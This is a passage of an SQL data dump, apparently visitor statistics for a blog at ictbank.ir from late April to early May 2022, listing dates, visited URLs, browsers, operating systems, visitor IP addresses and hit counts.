(20596,'2022-04-29','http://ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','217.138.211.243','000',0,2,0),
(20597,'2022-04-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.18','000',0,2,0),
(20598,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.27.19.185','000',0,22,0),
(20599,'2022-04-30','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(20600,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.220.149.23','000',0,1,0),
(20601,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.220.149.117','000',0,1,0),
(20602,'2022-04-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,12,0),
(20603,'2022-04-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20604,'2022-04-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20605,'2022-04-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.225.99','000',0,1,0),
(20606,'2022-04-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.103','000',0,2,0),
(20607,'2022-04-30','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.155','000',0,3,0),
(20608,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.135.131','000',0,2,0),
(20609,'2022-04-30','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(20610,'2022-04-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20611,'2022-04-30','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','217.138.211.243','000',0,13,0),
(20612,'2022-04-30','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,1,0),
(20613,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.116.89','000',0,2,0),
(20614,'2022-04-30','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.222','000',0,3,0),
(20615,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.19','000',0,3,0),
(20616,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.196','000',0,3,0),
(20617,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.197','000',0,1,0),
(20618,'2022-04-30','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,2,0),
(20619,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.96.181','000',0,2,0),
(20620,'2022-04-30','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,3,0),
(20621,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.173','000',0,2,0),
(20622,'2022-04-30','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.62','000',0,1,0),
(20623,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','36.99.136.137','000',0,1,0),
(20624,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,3,0),
(20625,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','36.99.136.136','000',0,1,0),
(20626,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.242.51','000',0,2,0),
(20627,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','36.99.136.128','000',0,2,0),
(20628,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.177','000',0,2,0),
(20629,'2022-04-30','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','155.138.135.59','000',0,3,0),
(20630,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.24.87.55','000',0,1,0),
(20631,'2022-04-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.240.232','000',0,2,0),
(20632,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.203.92.70','000',0,3,0),
(20633,'2022-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(20634,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','104.28.210.50','000',0,2,0),
(20635,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.8','000',0,3,0),
(20636,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','36.99.136.129','000',0,2,0),
(20637,'2022-04-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.18','000',0,1,0),
(20638,'2022-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','146.185.140.66','000',0,3,0),
(20639,'2022-04-30','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','186.159.178.209','000',0,1,0),
(20640,'2022-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(20641,'2022-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(20642,'2022-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.56','000',0,2,0),
(20643,'2022-05-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,7,0),
(20644,'2022-05-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(20645,'2022-05-01','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','90.46.73.212','000',0,1,0),
(20646,'2022-05-01','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(20647,'2022-05-01','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(20648,'2022-05-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20649,'2022-05-01','http://ictbank.ir/blog','Instagram','iOS','14.7.1',NULL,NULL,'','164.215.204.178','000',0,4,0),
(20650,'2022-05-01','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.96','000',0,2,0),
(20651,'2022-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.60.197','000',0,1,0),
(20652,'2022-05-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(20653,'2022-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(20654,'2022-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','67.223.117.118','000',0,1,0),
(20655,'2022-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,2,0),
(20656,'2022-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20657,'2022-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20658,'2022-05-01','http://ictbank.ir/','Chrome','OS X','10.12.2',NULL,NULL,'','104.223.57.234','000',0,4,0),
(20659,'2022-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(20660,'2022-05-01','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','172.255.82.67','000',0,1,0),
(20661,'2022-05-01','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.89','000',0,1,0),
(20662,'2022-05-01','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.161.69.250','000',0,7,0),
(20663,'2022-05-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,9,0),
(20664,'2022-05-02','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','95.217.42.102','000',0,5,0),
(20665,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(20666,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.130.66.43','000',0,2,0),
(20667,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.189.119.200','000',0,3,0),
(20668,'2022-05-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(20669,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','5.2.77.22','000',0,1,0),
(20670,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.100.17','000',0,1,0),
(20671,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','74.208.94.248','000',0,1,0),
(20672,'2022-05-02','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','191.102.151.112','000',0,1,0),
(20673,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(20675,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.81','000',0,2,0),
(20676,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.2.6.19','000',0,1,0),
(20677,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.148','000',0,2,0),
(20678,'2022-05-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20679,'2022-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.163.48','000',0,1,0),
(20680,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20681,'2022-05-02','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','196.247.160.153','000',0,1,0),
(20682,'2022-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,2,0),
(20683,'2022-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20684,'2022-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20685,'2022-05-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(20686,'2022-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.92.112.196','000',0,2,0),
(20687,'2022-05-03','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','165.231.168.253','000',0,11,0),
(20688,'2022-05-03','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.196.224.37','000',0,2,0),
(20689,'2022-05-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(20690,'2022-05-03','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','196.245.157.219','000',0,1,0),
(20691,'2022-05-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.16.85.141','000',0,2,0),
(20692,'2022-05-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.144.134','000',0,1,0),
(20693,'2022-05-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(20694,'2022-05-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,3,0),
(20695,'2022-05-03','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','136.228.129.2','000',0,1,0),
(20696,'2022-05-03','http://ictbank.ir/blog','Safari','OS X','10.6.6',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20697,'2022-05-03','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.100.253','000',0,1,0),
(20698,'2022-05-03','http://82.102.9.14/blog/','Unknown','Unknown','Unknown',NULL,NULL,'','185.100.87.174','000',0,1,0),
(20699,'2022-05-03','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','191.102.151.112','000',0,1,0),
(20700,'2022-05-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','173.255.206.130','000',0,1,0),
(20701,'2022-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.78.212','000',0,1,0),
(20702,'2022-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,2,0),
(20703,'2022-05-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,2,0),
(20704,'2022-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(20705,'2022-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(20706,'2022-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20707,'2022-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(20708,'2022-05-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.106','000',0,2,0),
(20709,'2022-05-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20710,'2022-05-04','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','50.3.83.117','000',0,1,0),
(20711,'2022-05-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.204.126.220','000',0,1,0),
(20712,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.189.119.200','000',0,2,0),
(20713,'2022-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(20714,'2022-05-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,8,0),
(20715,'2022-05-04','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.126','000',0,1,0),
(20716,'2022-05-04','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.137','000',0,1,0),
(20717,'2022-05-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','222.0.181.79','000',0,1,0),
(20718,'2022-05-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','1.176.219.55','000',0,1,0),
(20719,'2022-05-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','153.165.137.120','000',0,1,0),
(20720,'2022-05-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.203.125.98','000',0,1,0),
(20721,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(20722,'2022-05-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','130.162.169.44','000',0,2,0),
(20723,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.0.2.96','000',0,9,0),
(20724,'2022-05-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','213.168.250.107','000',0,2,0),
(20725,'2022-05-04','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','172.255.82.2','000',0,1,0),
(20726,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,11,0),
(20727,'2022-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(20728,'2022-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.141','000',0,2,0),
(20729,'2022-05-04','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','46.32.91.111','000',0,1,0),
(20730,'2022-05-04','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','77.130.71.132','000',0,1,0),
(20731,'2022-05-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(20732,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.120.128','000',0,1,0),
(20733,'2022-05-04','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','84.17.58.100','000',0,1,0),
(20734,'2022-05-04','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(20735,'2022-05-04','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.203.87','000',0,2,0),
(20736,'2022-05-04','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','103.14.35.145','000',0,1,0),
(20737,'2022-05-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','152.32.188.74','000',0,1,0),
(20738,'2022-05-04','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','118.193.45.5','000',0,1,0),
(20739,'2022-05-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.179.193.170','000',0,1,0),
(20740,'2022-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(20741,'2022-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(20742,'2022-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20743,'2022-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20744,'2022-05-04','http://ictbank.ir/blog','Chrome','OS X','10.13.1',NULL,NULL,'','172.255.82.177','000',0,1,0),
(20745,'2022-05-04','https://www.google.com/','Safari','OS X','10.15.4',NULL,NULL,'','86.98.40.227','000',0,1,0),
(20746,'2022-05-04','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(20747,'2022-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.241','000',0,1,0),
(20748,'2022-05-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(20749,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.89.115.235','000',0,2,0),
(20750,'2022-05-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,9,0),
(20751,'2022-05-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(20752,'2022-05-05','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','34.205.30.170','000',0,22,0),
(20753,'2022-05-05','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','196.245.158.77','000',0,1,0),
(20754,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','209.120.227.2','000',0,1,0),
(20755,'2022-05-05','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','151.234.139.84','000',0,1,0),
(20756,'2022-05-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.18','000',0,2,0),
(20757,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,2,0),
(20758,'2022-05-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.91.186.132','000',0,1,0),
(20759,'2022-05-05','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.174','000',0,1,0),
(20760,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.173.104','000',0,1,0),
(20761,'2022-05-05','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','165.231.84.178','000',0,1,0),
(20762,'2022-05-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20763,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,2,0),
(20764,'2022-05-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(20765,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.59.126.79','000',0,2,0),
(20766,'2022-05-05','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,3,0),
(20767,'2022-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(20768,'2022-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(20769,'2022-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20770,'2022-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20771,'2022-05-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(20772,'2022-05-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20773,'2022-05-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20774,'2022-05-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.30','000',0,5,0),
(20775,'2022-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,11,0),
(20776,'2022-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.16.103.46','000',0,9,0),
(20777,'2022-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','174.138.18.143','000',0,2,0),
(20778,'2022-05-06','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','196.247.160.241','000',0,1,0),
(20779,'2022-05-06','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,1,0),
(20780,'2022-05-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(20781,'2022-05-06','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.82.78.39','000',0,1,0),
(20782,'2022-05-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,3,0),
(20783,'2022-05-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','199.188.200.106','000',0,1,0),
(20784,'2022-05-06','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','38.2.74.71','000',0,1,0),
(20785,'2022-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','144.160.96.228','000',0,1,0),
(20786,'2022-05-06','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','191.102.151.112','000',0,1,0),
(20787,'2022-05-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.94','000',0,2,0),
(20788,'2022-05-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.80','000',0,2,0),
(20789,'2022-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.18.108','000',0,1,0),
(20790,'2022-05-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.101','000',0,6,0),
(20791,'2022-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(20792,'2022-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(20793,'2022-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(20794,'2022-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20795,'2022-05-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.93','000',0,2,0),
(20796,'2022-05-06','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','191.102.151.138','000',0,1,0),
(20797,'2022-05-06','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','38.2.86.73','000',0,1,0),
(20798,'2022-05-06','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.241.177.233','000',0,2,0),
(20799,'2022-05-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(20800,'2022-05-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20801,'2022-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(20802,'2022-05-07','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(20803,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(20804,'2022-05-07','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','185.85.163.242','000',0,1,0),
(20805,'2022-05-07','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','196.245.158.125','000',0,1,0),
(20806,'2022-05-07','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','185.39.144.147','000',0,2,0),
(20807,'2022-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20808,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(20809,'2022-05-07','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.53','000',0,2,0),
(20810,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.151.157','000',0,1,0),
(20811,'2022-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.252','000',0,1,0),
(20812,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.64.93','000',0,3,0),
(20813,'2022-05-07','http://ictbank.ir/blog','Chrome','OS X','10.13.2',NULL,NULL,'','196.247.160.241','000',0,1,0),
(20814,'2022-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(20815,'2022-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(20816,'2022-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20817,'2022-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20818,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.152.161.40','000',0,1,0),
(20819,'2022-05-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.179.144','000',0,1,0),
(20820,'2022-05-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(20821,'2022-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.203.9.51','000',0,5,0),
(20822,'2022-05-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.9.20.101','000',0,6,0),
(20823,'2022-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,3,0),
